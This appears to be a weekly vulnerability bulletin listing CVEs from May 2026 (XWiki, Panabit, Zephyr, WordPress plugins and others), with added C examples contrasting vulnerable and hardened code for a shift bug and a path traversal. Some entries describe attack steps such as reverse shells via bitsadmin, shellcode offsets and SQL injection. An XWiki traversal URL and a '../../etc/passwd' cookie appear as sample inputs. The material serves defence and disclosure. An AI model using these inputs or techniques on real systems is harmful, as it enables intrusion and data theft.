| Unknown--WP Maps | The WP Maps WordPress plugin before 4.9.3 does not properly sanitize a parameter before using it in a file path, allowing authenticated users to perform Local File Inclusion attacks. | 2026-05-18 | not yet calculated | CVE-2026-6381 | https://wpscan.com/vulnerability/18b36672-58d7-44fa-b653-b728e9ef257a/ |
| Unknown--WP Photo Album Plus | The WP Photo Album Plus WordPress plugin before 9.1.11.001 does not properly sanitize and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks. | 2026-05-18 | not yet calculated | CVE-2026-6379 | https://wpscan.com/vulnerability/60b88fd2-4048-4773-b319-63caaf5bd8eb/ |
| vaadin--flow | A possible information disclosure vulnerability exists in the Vaadin Maven plugin and Vaadin Gradle plugin that exposes the full set of environment variables in build logs whenever the frontend build process exits with a non-zero status. Because the build environment may contain credentials supplied as secrets, any failed frontend build can expose those secrets in clear text in CI logs and archived build artifacts. Users of affected versions should apply the following mitigation or upgrade. Affected product versions and mitigation: Vaadin 23.0.0 - 23.6.9: upgrade to 23.6.10; Vaadin 24.0.0 - 24.9.16: upgrade to 24.9.17 or newer; Vaadin 24.10.0 - 24.10.3: upgrade to 24.10.4 or newer; Vaadin 25.0.0 - 25.0.10: upgrade to 25.0.11 or newer; Vaadin 25.1.0 - 25.1.4: upgrade to 25.1.5 or newer. Please note that Vaadin versions 10-13 and 15-22 are no longer supported and you should update either to the latest 23, 24, or 25 version. Artifacts (Maven coordinates: vulnerable versions, fixed version): com.vaadin:flow-plugin-base: 23.0.0 - 23.6.10, ≥23.6.11; 24.0.0 - 24.9.17, ≥24.9.18; 24.10.0 - 24.10.3, ≥24.10.4; 25.0.0 - 25.0.11, ≥25.0.12; 25.1.0 - 25.1.4, ≥25.1.5. com.vaadin:flow-maven-plugin: 23.0.0 - 23.6.10, ≥23.6.11; 24.0.0 - 24.9.17, ≥24.9.18; 24.10.0 - 24.10.3, ≥24.10.4; 25.0.0 - 25.0.11, ≥25.0.12; 25.1.0 - 25.1.4, ≥25.1.5. com.vaadin:flow-gradle-plugin: 24.0.0 - 24.9.17, ≥24.9.18; 24.10.0 - 24.10.3, ≥24.10.4; 25.0.0 - 25.0.11, ≥25.0.12; 25.1.0 - 25.1.4, ≥25.1.5. | 2026-05-19 | not yet calculated | CVE-2026-7860 | https://vaadin.com/security/cve-2026-7860 https://github.com/vaadin/flow/pull/24219 |
| vifm--vifm | vifm is vulnerable to a heap buffer overflow during the history merge process when saving the state file (vifminfo.json). The flaw occurs because release builds lack a runtime check on the length of history entries, so a crafted long path or command in the history can cause memory corruption or an application crash. Releases from 0.12.1 to 0.14.3 (inclusive) are considered vulnerable. This issue was fixed in commit 23063c7. | 2026-05-22 | not yet calculated | CVE-2026-8997 | https://cert.pl/en/posts/2026/05/CVE-2026-8997 https://github.com/vifm/vifm/commit/23063c741f15a85621fd232dfc3ac5b779f6910d |
| WineHQ--Wine | Wine ships a .desktop file that registers itself as a MIME handler for EXE files and several other Windows executable file types. In some configurations, handling of an EXE file causes that file to be blindly executed with the permissions of the invoker. This allows escaping Flatpak and Snap sandboxes, because MIME handlers are not intended for use by code interpreters and loaders. NOTE: some parties feel that this is not a bug to be addressed in Wine, because there is no known solution that avoids a severe loss of usability (Wine could be a binfmt-misc handler, but binfmt-misc does not exist on all platforms supported by Wine). | 2026-05-24 | not yet calculated | CVE-2026-48831 | https://bugs.winehq.org/show_bug.cgi?id=59767 https://www.openwall.com/lists/oss-security/2026/05/19/1 |
| Xen--Xen | Any guest can cause xenstored to crash by issuing a XS_RESET_WATCHES command within a transaction, because an assert() triggers. If xenstored was built with NDEBUG defined, nothing bad happens, since assert() is a no-op in that case. Note that the default is not to define NDEBUG for xenstored builds, even in release builds of Xen. | 2026-05-19 | not yet calculated | CVE-2026-23557 | https://xenbits.xenproject.org/xsa/advisory-484.html |
| Xen--Xen | The adjustments made for XSA-379 as well as those subsequently becoming XSA-387 still left a race window, when a HVM or PVH guest does a grant table version change from v2 to v1 in parallel with mapping the status page(s) via XENMEM_add_to_physmap. Some of the status pages may then be freed while mappings of them would still be inserted into the guest's secondary (P2M) page tables. | 2026-05-19 | not yet calculated | CVE-2026-23558 | https://xenbits.xenproject.org/xsa/advisory-486.html |
| xwiki--xwiki-commons | XWiki Platform is a generic wiki platform. Versions prior to 18.1.0-rc-1, 17.10.3, 17.4.9, and 16.10.17 allow configuration files to be read by using URLs such as http://localhost:8080/bin/ssx/Main/WebHome?resource=/../../WEB-INF/xwiki.cfg&minify=false, leading to path traversal. The vulnerability can be exploited via the resource parameter of the ssx and jsx endpoints by using leading slashes. This issue has been patched in 18.1.0-rc-1, 17.10.3, 17.4.9, 16.10.17. | 2026-05-20 | not yet calculated | CVE-2026-23734 | https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-xq3r-2qv5-vqqm https://github.com/xwiki/xwiki-commons/commit/a979cafd89f6a9c9c0b9ab19744d672df64429bf https://jira.xwiki.org/browse/XCOMMONS-3547 |
| xwiki--xwiki-platform | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 18.1.0-rc-1, 17.10.3, 17.4.9, and 16.10.17, the POST /wikis/{wikiName} API executes a XAR import without performing any authentication or authorization checks, allowing an unauthenticated attacker to create or update documents in the target wiki. This vulnerability has been patched in XWiki 16.10.17, 17.4.9, 17.10.3, 18.0.1 and 18.1.0-rc-1. | 2026-05-20 | not yet calculated | CVE-2026-33137 | https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qrvh-r3f2-9h4r https://github.com/xwiki/xwiki-platform/commit/4b7b95b79256374d487e9ece1dc48f527966990f https://jira.xwiki.org/browse/XWIKI-23953 |
| Zenshin--hitarth-gg | An OS command injection vulnerability in the /stream-to-vlc Express route in hitarth-gg Zenshin before 2.7.0 allows remote attackers to execute arbitrary commands via the url parameter. | 2026-05-19 | not yet calculated | CVE-2026-37281 | https://github.com/hitarth-gg/zenshin https://github.com/hitarth-gg/zenshin/commit/7d31c6edfbac978f0ad44c66d761bab9dcd2fa27 https://gist.github.com/MitruStefan/cf016709252aabbec7f95b7a70e0cfba |
| zephyrproject-rtos--Zephyr | A bitwise shift vulnerability in Zephyr's PTP subsystem allows a remote attacker to cause undefined behavior and potential system crashes. An attacker sends a crafted PTP_MSG_MANAGEMENT message to set an unvalidated negative log_announce_interval value in the port's data set. When a subsequent PTP_MSG_ANNOUNCE message is processed, port_timer_set_timeout_random computes a timeout as NSEC_PER_SEC >> -log_seconds; if the attacker-supplied value is sufficiently negative (e.g., -127), the shift amount exceeds the 64-bit integer width, triggering undefined behavior in C. This can cause a system crash via a compiler-generated illegal instruction trap on some architectures, or produce an erroneous zero timeout leading to resource starvation loops or other logical errors. | 2026-05-22 | not yet calculated | CVE-2026-5072 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3v98-458v-388r |
| LalanaChami--Pharmacy Management System | API endpoints in LalanaChami Pharmacy Management System (commit 5c3d028) lack authentication middleware. Unauthenticated remote attackers can exploit this to dump all user records (including bcrypt password hashes) via /api/user/getUserData, modify drug inventory, and access private medical prescription data via /api/doctorOder. | 2026-05-19 | not yet calculated | CVE-2026-31071 | https://github.com/LalanaChami/Pharmacy-Mangment-System/tree/5c3d02888631166649856f71d542387114b3010b/backend/routes https://gist.github.com/nedlir/bc8ad4693c53256819280e8f5de49286 |
| Panabit--PAP-XM320 | A command injection vulnerability exists in Panabit PAP-XM320 up to and including V7.7. The web management interface invokes the backend helper /usr/sbin/pappiw and passes user-controlled parameters to it. The helper performs unsafe argument processing using eval, which allows command injection when attacker-controlled input is included in the arguments. As a result, an authenticated remote attacker with access to the management interface may execute arbitrary shell commands. | 2026-05-19 | not yet calculated | CVE-2026-36827 | https://www.panabit.com/ https://secreu.notion.site/CVE-2026-36827-3652c0ab46158036a888ef4a12b104bf |
| Panabit--PAP-XM320 | A command injection vulnerability exists in the /cgi-bin/tools/ajax_cmd endpoint of Panabit PAP-XM320 up to and including v7.7. The CGI component allows authenticated users to execute arbitrary shell commands with root privileges via the action=runcmd parameter. | 2026-05-19 | not yet calculated | CVE-2026-36828 | https://www.panabit.com/ https://secreu.notion.site/CVE-2026-36828-3652c0ab461580f28f50ddc37ce4e1d6 |
| Panabit--PAP-XM320 | An authentication bypass vulnerability exists in the embedded HTTP server of Panabit PAP-XM320 up to and including v7.7. The server validates session cookies using a filesystem existence check based on a user-controlled cookie value without proper sanitization, allowing directory traversal and bypass of authentication. | 2026-05-19 | not yet calculated | CVE-2026-36829 | https://www.panabit.com/ https://secreu.notion.site/CVE-2026-36829-3652c0ab461580e19704e87b18865714 |
| Uncrustify--Uncrustify | Buffer overflow vulnerability in Uncrustify (affected: Uncrustify_d-0.82.0-132-bcc41cbdc; fixed in commit 68e67b9a1435a1bb173b106fedb4a4f510972bdc) allows a local attacker to cause a denial of service via the check_template function in check_template.cpp and the tokenize_cleanup function of the uncrustify executable. | 2026-05-21 | not yet calculated | CVE-2026-36189 | https://github.com/uncrustify/uncrustify https://github.com/uncrustify/uncrustify/issues/4636 https://github.com/uncrustify/uncrustify/pull/4641 https://gist.github.com/Criticayon/5da6d6c9cf068e494347c659d01982a9 |
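The Zephyr PTP entry (CVE-2026-5072) describes a bug class worth seeing in code: an attacker-supplied signed field is stored unvalidated and later used as a shift count, and a count of 127 on a 64-bit value is undefined behaviour in C. The following C code is an added example written for this page, not Zephyr's code. NSEC_PER_SEC and the field name log_announce_interval match the advisory; the interval bounds, the helper names and the rejection policy are assumptions made for the demonstration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Added illustration of the CVE-2026-5072 bug class; not Zephyr's code.
 * The bounds below are assumptions for the demonstration, not PTP limits. */
#define NSEC_PER_SEC 1000000000ULL
#define LOG_INTERVAL_MIN (-7)   /* assumed: fastest announce is 1/128 s */
#define LOG_INTERVAL_MAX 4      /* assumed: slowest announce is 16 s */

/* Vulnerable pattern from the advisory: the shift count comes straight from
 * the attacker-controlled int8 field. For log_seconds = -127 the count is
 * 127, beyond the 64-bit width, which is undefined behaviour in C.
 * Shown for contrast only; never called with out-of-range values here. */
static uint64_t timeout_ns_unchecked(int8_t log_seconds) {
    if (log_seconds >= 0) {
        return NSEC_PER_SEC << log_seconds;
    }
    return NSEC_PER_SEC >> -log_seconds;
}

/* Hardened, step 1: validate the PTP_MSG_MANAGEMENT value when it is stored
 * in the port data set, so later timer code never sees an unsafe value. */
static bool set_log_announce_interval(int8_t *log_announce_interval, int8_t requested) {
    if (requested < LOG_INTERVAL_MIN || requested > LOG_INTERVAL_MAX) {
        return false;               /* reject the management update */
    }
    *log_announce_interval = requested;
    return true;
}

/* Hardened, step 2: the timer path independently refuses a shift count
 * outside [0, 63], a zero timeout (which would spin the timer) and a
 * left shift that overflows 64 bits. */
static bool timeout_ns_checked(int8_t log_seconds, uint64_t *out) {
    int shift = log_seconds < 0 ? -log_seconds : log_seconds;   /* int8 promotes to int, so -(-128) is fine */
    if (shift > 63) {
        return false;
    }
    uint64_t t = log_seconds < 0 ? (NSEC_PER_SEC >> shift) : (NSEC_PER_SEC << shift);
    if (t == 0) {
        return false;               /* underflowed to a zero timeout */
    }
    if (log_seconds >= 0 && (t >> shift) != NSEC_PER_SEC) {
        return false;               /* left shift lost high bits */
    }
    *out = t;
    return true;
}

int main(void) {
    int8_t dataset = 1;
    uint64_t t = 0;
    printf("store -127: %s\n", set_log_announce_interval(&dataset, -127) ? "accepted" : "rejected");
    printf("store -3:   %s\n", set_log_announce_interval(&dataset, -3) ? "accepted" : "rejected");
    printf("timeout(-1): %s %llu ns\n", timeout_ns_checked(-1, &t) ? "ok" : "rejected", (unsigned long long)t);
    printf("timeout(-127): %s\n", timeout_ns_checked(-127, &t) ? "ok" : "rejected");
    printf("unchecked(-1): %llu ns\n", (unsigned long long)timeout_ns_unchecked(-1));
    return 0;
}
```

The two checks are deliberately redundant: the data-set setter is where the protocol-level bound belongs, while the timer-side check protects against any other path that writes the field, and against the zero-timeout case the advisory mentions, which a simple range check on the stored value would not catch for a shift that is legal but too large.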
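The Panabit authentication bypass (CVE-2026-36829, a session cookie concatenated into a filesystem path and then tested for existence) and the XWiki leading-slash traversal (CVE-2026-23734) share one root cause: an attacker-controlled string becomes a path component without validation. The following C code is an added example written for this page, not Panabit's or XWiki's code; the session directory, the 32-lowercase-hex token format and the helper names are assumptions made for the demonstration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added illustration; not code from either affected product. Assumption:
 * a session is a file named after its token under SESSION_DIR, and a
 * request is authenticated if that file exists. */
#define SESSION_DIR "/var/run/sessions"
#define TOKEN_LEN 32                     /* assumed: 32 lowercase hex digits */

/* Vulnerable construction: the cookie value is pasted into the path as-is.
 * A cookie of "../../etc/passwd" makes the existence check succeed for a
 * file that is not a session at all. */
static int session_path_unchecked(char *out, size_t outlen, const char *cookie) {
    return snprintf(out, outlen, "%s/%s", SESSION_DIR, cookie);
}

/* Hardened: accept only tokens that are exactly TOKEN_LEN lowercase hex
 * digits. Slashes, dots, wrong length and uppercase are all rejected before
 * any path is built, so no path-level cleanup is needed afterwards. */
static bool session_token_valid(const char *cookie) {
    if (cookie == NULL || strlen(cookie) != TOKEN_LEN) {
        return false;
    }
    for (size_t i = 0; i < TOKEN_LEN; i++) {
        char c = cookie[i];
        bool hex = (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f');
        if (!hex) {
            return false;
        }
    }
    return true;
}

static bool session_path_checked(char *out, size_t outlen, const char *cookie) {
    if (!session_token_valid(cookie)) {
        return false;
    }
    int n = snprintf(out, outlen, "%s/%s", SESSION_DIR, cookie);
    return n > 0 && (size_t)n < outlen;
}

/* Detection helper for the demonstration: does any "/"-separated segment of
 * the built path equal ".."? True means the path points outside SESSION_DIR. */
static bool path_has_dotdot_segment(const char *path) {
    const char *p = path;
    while (*p) {
        const char *end = strchr(p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            return true;
        }
        if (!end) {
            break;
        }
        p = end + 1;
    }
    return false;
}

int main(void) {
    char buf[256];
    session_path_unchecked(buf, sizeof buf, "../../etc/passwd");
    printf("unchecked: %s (escapes: %s)\n", buf, path_has_dotdot_segment(buf) ? "yes" : "no");
    printf("checked traversal token: %s\n",
           session_path_checked(buf, sizeof buf, "../../etc/passwd") ? "accepted" : "rejected");
    if (session_path_checked(buf, sizeof buf, "0123456789abcdef0123456789abcdef")) {
        printf("checked valid token: %s (escapes: %s)\n", buf, path_has_dotdot_segment(buf) ? "yes" : "no");
    }
    return 0;
}
```

Allow-listing the token format is preferable to stripping "../" or checking the resolved path after the fact: a fixed-length hex alphabet cannot express a separator, a dot or an absolute path, so the existence check can only ever hit files the server itself created.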
Vulnerability Summary for the Week of May 11, 2026
Posted on Tuesday May 19, 2026
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| acl--ACL Analytics | ACL Analytics versions 11.x through 13.0.0.579 contain an arbitrary code execution vulnerability that allows attackers to execute arbitrary commands by leveraging the EXECUTE function. Attackers can use bitsadmin to download malicious PowerShell scripts and execute them with system privileges to establish reverse shells and gain complete system control. | 2026-05-17 | 9.8 | CVE-2018-25320 | ExploitDB-44281 Official Product Homepage Product Reference VulnCheck Advisory: ACL Analytics 11.x - 13.0.0.579 Arbitrary Code Execution |
| gitbucket--GitBucket | GitBucket 4.23.1 contains an unauthenticated remote code execution vulnerability that allows attackers to execute arbitrary commands by exploiting weak secret token generation and insecure file upload functionality. Attackers can brute-force the Blowfish encryption key, upload a malicious JAR plugin via the git-lfs endpoint, and execute system commands through an exposed exploit endpoint. | 2026-05-17 | 9.8 | CVE-2018-25332 | ExploitDB-44668 Official Product Homepage Product Reference VulnCheck Advisory: GitBucket 4.23.1 Unauthenticated Remote Code Execution |
| peugeot-music-plugin--Peugeot Music | WordPress Plugin Peugeot Music 1.0 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by sending POST requests to the upload.php endpoint. Attackers can upload files with arbitrary extensions by manipulating the 'name' parameter to execute code from the uploads directory. | 2026-05-17 | 9.8 | CVE-2018-25335 | ExploitDB-44737 VulnCheck Advisory: WordPress Plugin Peugeot Music 1.0 Arbitrary File Upload |
| Paiement--Ecommerce Systempay | Ecommerce Systempay 1.0 contains a weak cryptographic implementation vulnerability that allows attackers to brute force the 16-character production secret key used for payment signature generation. Attackers can extract payment form data and signatures from POST requests to the payment endpoint, then use SHA1 hash comparison to iteratively test key candidates until discovering the correct production key, enabling them to forge valid payment signatures and manipulate transaction amounts. | 2026-05-13 | 9.8 | CVE-2020-37168 | ExploitDB-48017 Official Product Homepage Product Reference VulnCheck Advisory: Ecommerce Systempay 1.0 Production Key Brute Force |
| Yerootech--iDS6 DSSPro Digital Signage System | iDS6 DSSPro Digital Signage System 6.2 contains a CAPTCHA security bypass vulnerability that allows attackers to bypass authentication by requesting the autoLoginVerifyCode object. Attackers can retrieve valid CAPTCHA codes via the login endpoint and use them to perform brute-force attacks against user accounts. | 2026-05-16 | 9.8 | CVE-2020-37228 | ExploitDB-48991 Vulnerability Advisory Official Product Homepage VulnCheck Advisory: iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass |
| Gegl--libbabl | libbabl 0.1.62 contains a broken double free detection vulnerability that allows attackers to bypass memory safety checks by exploiting signature overwriting in freed chunks. Attackers can call babl_free() twice on the same pointer without triggering detection, as libc's malloc metadata overwrites babl's signature field upon freeing, enabling potential memory corruption and code execution. | 2026-05-16 | 9.8 | CVE-2020-37239 | ExploitDB-49259 Official Product Homepage Product Reference VulnCheck Advisory: libbabl 0.1.62 Broken Double Free Detection Memory Safety |
| Jsonpickle--python jsonpickle | python jsonpickle 2.0.0 contains a remote code execution vulnerability that allows attackers to execute arbitrary Python commands by deserializing malicious JSON payloads containing py/repr objects. Attackers can craft JSON strings with py/repr directives that invoke the eval function during deserialization to execute system commands and arbitrary code. | 2026-05-16 | 9.8 | CVE-2021-47952 | ExploitDB-49585 Official Product Homepage Product Reference VulnCheck Advisory: python jsonpickle 2.0.0 Remote Code Execution via py/repr |
| wp-super-edit--WP Super Edit | WordPress Plugin WP Super Edit 2.5.4 and earlier contains an unrestricted file upload vulnerability in the FCKeditor component that allows attackers to upload dangerous file types without validation. Attackers can upload arbitrary files through the filemanager upload endpoint to achieve remote code execution and complete system compromise. | 2026-05-15 | 9.8 | CVE-2021-47965 | ExploitDB-49839 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin WP Super Edit 2.5.4 Unrestricted File Upload |
| Akilli Commerce Software Technologies Ltd. Co.--E-Commerce Website | Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Blind SQL Injection. This issue affects E-Commerce Website: before 4.5.001. | 2026-05-14 | 9.8 | CVE-2025-11024 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0222 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | All versions of Hitachi Vantara Pentaho Data Integration & Analytics contain a JDBC driver for H2 databases that is vulnerable to external script execution when a new connection is created by a data source administrator. | 2026-05-13 | 9.1 | CVE-2025-11159 | https://support.pentaho.com/hc/en-us/articles/39954640408077--Resolved-Hitachi-Vantara-Pentaho-Data-Integration-Analytics-Dependency-on-Vulnerable-Third-Party-Component-Versions-before-10-2-0-7-and-11-0-0-0-Impacted-CVE-2025-11159 |
| alloksoft--Fast AVI MPEG Splitter | Allok Fast AVI MPEG Splitter 1.2 contains a stack based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious license name string. Attackers can craft a payload with 780 bytes of junk data followed by structured shellcode and place it in the License Name field to trigger the overflow and execute code with application privileges. | 2026-05-17 | 8.4 | CVE-2018-25322 | ExploitDB-44341 Official Product Homepage Product Reference VulnCheck Advisory: Allok Fast AVI MPEG Splitter 1.2 Stack Based Buffer Overflow |
| Alloksoft--Allok AVI DivX MPEG to DVD Converter | Allok AVI DivX MPEG to DVD Converter 2.6.1217 contains a structured exception handler buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious payload. Attackers can craft a text file with a specially crafted buffer containing shellcode and SEH chain overwrite values, then paste the contents into the License Name field to trigger code execution. | 2026-05-17 | 8.4 | CVE-2018-25323 | ExploitDB-44363 VulnCheck Advisory: Allok AVI DivX MPEG to DVD Converter 2.6.1217 Buffer Overflow SEH |
| vxsearch--VX Search | VX Search 10.6.18 contains a local buffer overflow vulnerability that allows attackers to overwrite the instruction pointer by supplying an oversized string in the directory field. Attackers can craft a malicious input file containing 271 bytes of junk data followed by a return address to execute arbitrary code with application privileges. | 2026-05-17 | 8.4 | CVE-2018-25328 | ExploitDB-44494 Official Product Homepage Official Product Homepage VulnCheck Advisory: VX Search 10.6.18 Local Buffer Overflow via Directory Field |
| Joomlaextensions--Joomla! extension EkRishta | Joomla! extension EkRishta 2.10 contains persistent cross-site scripting and SQL injection vulnerabilities that allow attackers to inject malicious code through profile fields and POST parameters. Attackers can inject script payloads in profile information fields like Address that execute when users visit the profile, or submit SQL injection payloads via the phone_no parameter to the user_setting endpoint to manipulate database queries. | 2026-05-17 | 8.2 | CVE-2018-25330 | ExploitDB-44660 Official Product Homepage Product Reference VulnCheck Advisory: Joomla! EkRishta 2.10 Persistent XSS and SQL Injection |
| nordex-online--N149 Wind Turbine Web Server | Nordex N149/4.0-4.5 Wind Turbine Web Server 4.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the login parameter in login.php. Attackers can submit crafted POST requests with SQL injection payloads in the login field to extract sensitive database information and bypass authentication mechanisms. | 2026-05-17 | 8.2 | CVE-2018-25333 | ExploitDB-44684 Official Product Homepage VulnCheck Advisory: Nordex N149/4.0-4.5 Wind Turbine Web Server SQL Injection |
| Bylancer--Zechat | Zechat 1.5 contains a SQL injection vulnerability in the hashtag parameter that allows unauthenticated attackers to extract database information using union-based techniques. Attackers can exploit the hashtag parameter with union-based payloads to retrieve table and column names. | 2026-05-17 | 8.2 | CVE-2018-25338 | ExploitDB-44685 Official Product Homepage VulnCheck Advisory: Zechat 1.5 SQL Injection via hashtag parameter |
| Bylancer--Zechat | Zechat 1.5 contains a SQL injection vulnerability in the v parameter that allows unauthenticated attackers to extract database information using time-based blind techniques. Attackers can exploit the v parameter with sleep-based blind injection to confirm vulnerability and extract data. | 2026-05-17 | 8.2 | CVE-2018-25339 | ExploitDB-44685 Official Product Homepage VulnCheck Advisory: Zechat 1.5 SQL Injection via v parameter (time-based blind) |
| Hdwplayer--com_hdwplayer | Joomla com_hdwplayer 4.2 contains an SQL injection vulnerability in the search.php file that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the hdwplayersearch parameter. Attackers can submit POST requests with crafted SQL payloads in the hdwplayersearch parameter to extract sensitive database information from the hdwplayer_videos table. | 2026-05-13 | 8.2 | CVE-2020-37218 | ExploitDB-48242 Official Product Homepage Product Reference VulnCheck Advisory: Joomla com_hdwplayer 4.2 SQL Injection via search.php |
| Drive-software--Atomic Alarm Clock | Atomic Alarm Clock 6.3 contains a stack overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string to the display name textbox in the Time Zones Clock configuration. Attackers can craft a buffer with structured exception handling overwrite and encoded shellcode to bypass SafeSEH protections and execute arbitrary commands with application privileges. | 2026-05-13 | 8.4 | CVE-2020-37221 | ExploitDB-48346 VulnCheck Advisory: Atomic Alarm Clock 6.3 Stack Overflow via SEH Unicode |
| Heliossolutions--HS Brand Logo Slider | HS Brand Logo Slider 2.1 contains an unrestricted file upload vulnerability that allows authenticated users to bypass client-side file extension validation and upload arbitrary files. Attackers can intercept upload requests to the logoupload parameter in the admin interface and rename files to the executable extension .php to achieve remote code execution. | 2026-05-16 | 8.8 | CVE-2020-37227 | ExploitDB-48913 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin HS Brand Logo Slider 2.1 Unrestricted File Upload |
| Supsystic--Ultimate Maps | Supsystic Ultimate Maps 1.1.12 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'sidx' GET parameter. Attackers can send crafted requests to the getListForTbl action with boolean-based blind or time-based blind SQL injection payloads to extract sensitive database information. | 2026-05-16 | 8.2 | CVE-2020-37242 | ExploitDB-49532 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Ultimate Maps 1.1.12 SQL Injection via sidx |
| Supsystic--Pricing Table | Supsystic Pricing Table 1.8.7 contains an SQL injection vulnerability in the 'sidx' GET parameter that allows unauthenticated attackers to execute arbitrary SQL queries through the getListForTbl action. The plugin also contains stored cross-site scripting vulnerabilities in the 'Edit name' and 'Edit HTML' fields that execute malicious scripts when viewing pricing tables. | 2026-05-16 | 8.2 | CVE-2020-37243 | ExploitDB-49533 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Pricing Table 1.8.7 SQL Injection XSS |
| Supsystic--Membership | Supsystic Membership 1.4.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'search' and 'sidx' parameters. Attackers can send GET requests to the badges module with crafted payloads to extract sensitive database information using time-based blind or UNION-based SQL injection techniques. | 2026-05-16 | 8.2 | CVE-2020-37244 | ExploitDB-49540 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Membership 1.4.7 SQL Injection via sidx |
| LayerBB--LayerBB | LayerBB 1.1.4 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the search_query parameter. Attackers can send POST requests to /search.php with malicious search_query values using CASE WHEN statements to extract sensitive database information. | 2026-05-16 | 8.2 | CVE-2021-47954 | ExploitDB-49593 VulnCheck Advisory: LayerBB 1.1.4 SQL Injection via search_query Parameter |
| Egavilanmedia--EgavilanMedia PHPCRUD | EgavilanMedia PHPCRUD 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the firstname parameter. Attackers can send POST requests to insert.php with malicious firstname values to extract sensitive database information. | 2026-05-16 | 8.2 | CVE-2021-47956 | ExploitDB-49878 Official Product Homepage Product Reference VulnCheck Advisory: EgavilanMedia PHPCRUD 1.0 SQL Injection via firstname |
| Schlix--Schlix CMS | Schlix CMS 2.2.6-6 contains a remote code execution vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious extension packages through the block manager. Attackers can upload a crafted ZIP file containing PHP code in the packageinfo.inc file and trigger execution by accessing the About tab of the installed extension. | 2026-05-15 | 8.8 | CVE-2021-47964 | ExploitDB-49838 Official Product Homepage Product Reference VulnCheck Advisory: Schlix CMS 2.2.6-6 Remote Code Execution via core.blockmanager |
| Timeclock--PHP Timeclock | PHP Timeclock 1.04 contains time-based and boolean-based blind SQL injection vulnerabilities in the login_userid parameter of login.php that allow unauthenticated attackers to extract database contents. Attackers can submit crafted POST requests with SQL payloads using SLEEP functions or RLIKE conditional statements to dump sensitive database information including employee names and credentials. | 2026-05-15 | 8.2 | CVE-2021-47966 | ExploitDB-49849 Official Product Homepage Product Reference VulnCheck Advisory: PHP Timeclock 1.04 SQL Injection via login.php |
| Textpattern--TextPattern CMS | TextPattern CMS 4.9.0-dev contains a remote code execution vulnerability that allows authenticated attackers to upload arbitrary PHP files by exploiting the plugin upload functionality. Attackers can authenticate, retrieve a CSRF token from the plugin event page, and upload malicious PHP files to the textpattern/tmp/ directory for code execution. | 2026-05-16 | 8.8 | CVE-2021-47976 | ExploitDB-50095 Official Product Homepage Product Reference VulnCheck Advisory: TextPattern CMS 4.9.0-dev Authenticated Remote Code Execution via Plugin Upload |
| Miniorange--Backup and Restore | WordPress Plugin Backup and Restore 1.0.3 contains an arbitrary file deletion vulnerability that allows authenticated attackers to delete files by manipulating parameters in AJAX requests. Attackers can send POST requests to admin-ajax.php with crafted file_name and folder_name parameters to delete arbitrary files from the WordPress installation directory. | 2026-05-16 | 8.8 | CVE-2021-47979 | ExploitDB-50503 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Backup and Restore 1.0.3 Arbitrary File Deletion |
| WSO2--WSO2 Identity Server | The Magic Link authentication flow accepts multiple invalid authentication requests without adequate rate limiting or resource control, leading to uncontrolled memory usage growth. This vulnerability can result in a denial-of-service condition, causing service unavailability for deployments that utilize the Magic Link authenticator. The impact is limited to these specific deployments and requires repeated invalid authentication attempts to trigger. | 2026-05-11 | 8.6 | CVE-2025-10470 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4469/ |
| APPYAP Technology and Information Inc.--Yaay Social Media App | Authorization bypass through User-Controlled key vulnerability in APPYAP Technology and Information Inc. Yaay Social Media App allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Yaay Social Media App: from 3.8.0 through 24102025. | 2026-05-14 | 8.8 | CVE-2025-12008 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0238 |
| Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc.--Library Automation System | Incorrect Authorization vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Library Automation System: from v.19.5 before v.22.1. | 2026-05-14 | 8.8 | CVE-2025-15023 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240 |
